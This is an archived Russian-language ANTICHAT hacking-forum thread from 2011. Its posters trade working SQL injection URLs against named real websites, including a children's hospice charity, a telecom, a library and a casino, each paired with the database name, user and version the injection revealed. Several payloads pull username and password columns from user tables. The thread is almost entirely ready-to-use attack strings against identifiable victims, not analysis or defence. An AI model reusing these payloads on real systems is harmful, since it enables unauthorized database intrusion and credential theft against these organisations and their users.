ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.01.2011, 00:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
PR -5
Имя БД; db_hospiz
Версия БД: MySQL 4.1.10a-Max-log
Имя пользователя БД; cl_hospiz@localhost
Эксплойт:
Код:
Code:
http://www.deutscher-kinderhospizverein.de/42_ambulante_einzel_wir.php?id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(' ; ',DATABASE(),USER(),VERSION()),0x71),0x71),7+--+
PR -4
Имя БД; DB325512
Версия БД: MySQL 5.0.91-log
Имя пользователя БД; U325512@bignurker.st
Эксплойт:
Код:
Code:
http://www.genuin.de/en/04_d.php?k=-1%27+union+select+1,user%28%29,group_concat%28table_name%29,4,5,database%28%29,version%28%29,8,9,10,11,12+from+information_schema.tables+--+
|
|
|
|
07.01.2011, 00:17
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Сообщение от good.god
good.god said:
в таблице auths поля user и pass. но вот достать не получается, доступа чтоли к таблице нет
Код:
Code:
http://www.suncellular.com.ph/phone_detail.php?id=-79+union+select+1,concat(user,0x3a,pass),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+cphulkd.auths limit 1+--+
Та, вроде бы, все нормально получается ^_^
|
|
|
07.01.2011, 17:47
|
|
Новичок
Регистрация: 13.08.2009
Сообщений: 10
Провел на форуме:
179283
Репутация:
10
|
|
Код:
Code:
http://kalakkalcinema.com/tamil_detail.php?id=-323+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x74626c5f61646d696e--
http://www.verdammnis.com/pictures.php?id=-323+union+select+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+information_schema.tables--
http://www.pesic.name/slika.php?id=-323+union+select+1,2,3,table_name,5,6,7,8,9,10+from+information_schema.tables--
|
|
|
|
07.01.2011, 19:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.thecommunitylibrary.org/calendar.php?cID=55+and+length(char(1))!=1+union(select+1,2,3,4,5,6,7)
|
|
|
|
08.01.2011, 00:17
|
|
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
Провел на форуме:
1298413
Репутация:
44
|
|
Код:
Code:
http://www.supairball.com/site2008/2nd.php?n=9-1+union+select+1,concat_ws('%20;%20',database(),user(),version()),group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables--
supairball
supairball@wtc40.zarcrom.net
5.0.67-0ubuntu6-log
Код:
Code:
http://www.salasbingo.com/en/casino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
5.0.91-log
winzingo
winzingo@173.201.216.78
при information_schema.tables, как я понял, union фильтруется, обойти не получилось. При простом переборе вроде наткнулся на таблицу с юзерами, а именно w.user, но пишет что-то типа нет прав для чтения этой таблицы(может и ошибаюсь). Это я всё про последнее... |
|
|
|
08.01.2011, 04:22
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 2
Провел на форуме:
7702
Репутация:
0
|
|
http://www.mattmo.nl/detail.php?project=125/**/union/**/select/**/USER(),2,3--
root@localhost
5.0.45-log
mattmo
---------
http://www.travelersjournal.com/articles2.php?ID=233/**/union/**/select/**/1,USER(),DATABASE(),4,VERSION(),6,7--
travjourn
travjourn@localhost
4.1.22
|
|
|
|
08.01.2011, 15:03
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
Код:
Code:
http://www.smokycarrot.com/index.php?rubID=0+union +select+1,2,3,version(),5,6,7 ,8,9,10,11,12,13,14,15--
Version - 5.0.67-log
User - smokycarrot@imu116.infomaniak.ch
Database - smokycarrotcom |
|
|
|
09.01.2011, 02:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
http://www.newacropol.ru/na/russia/entry/?id=-1088%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,concat_ws(0x3a,cal_login,cal_passwd),16,17, 18,19,20%20from%20afisha.webcal_user%20limit%200,1--
Version - 5.0.67
Database - afisha
ТИЦ400 PR5
|
|
|
|
10.01.2011, 16:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
30555
Репутация:
85
|
|
PR -4
Имя БД; shropshi_sccc
Версия БД: 5.0.89-community
Имя пользователя БД; shropshi_sccc@localhost
Эксплойт:
Код:
Code:
http://www.shropshireccc.co.uk/newsarticle.php?ID='+union+select+1,concat_ws('~',id,username,password),null,4,null,6+from+als3_users+--+
PR -2
Имя БД; heidi
Версия БД: MySQL 4.1.20
Имя пользователя БД; heidi_f@localhost
Эксплойт:
Код:
Code:
http://www.chinahiking.cn/hike.php?r=-1+union+select+1,2,3,4,5,6
|
|
|
|
10.01.2011, 18:00
|
|
Участник форума
Регистрация: 24.05.2009
Сообщений: 110
Провел на форуме:
1249612
Репутация:
133
|
|
cy 10
pr 1
espetsmash_cu@localhost
espetsmash_cu
5.0.77
Код:
Code:
http://eshop-spetsmash.kiev.ua/index.php?w=article&lang=ru&id=-3%20union%20select%201,VERSION%28%29,USER%28%29,DATABASE%28%29,5
information_schema доступна |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для S[N]EP](/avatars/avatar64392.jpg?2505597){kind=avatar}
Линейный вид
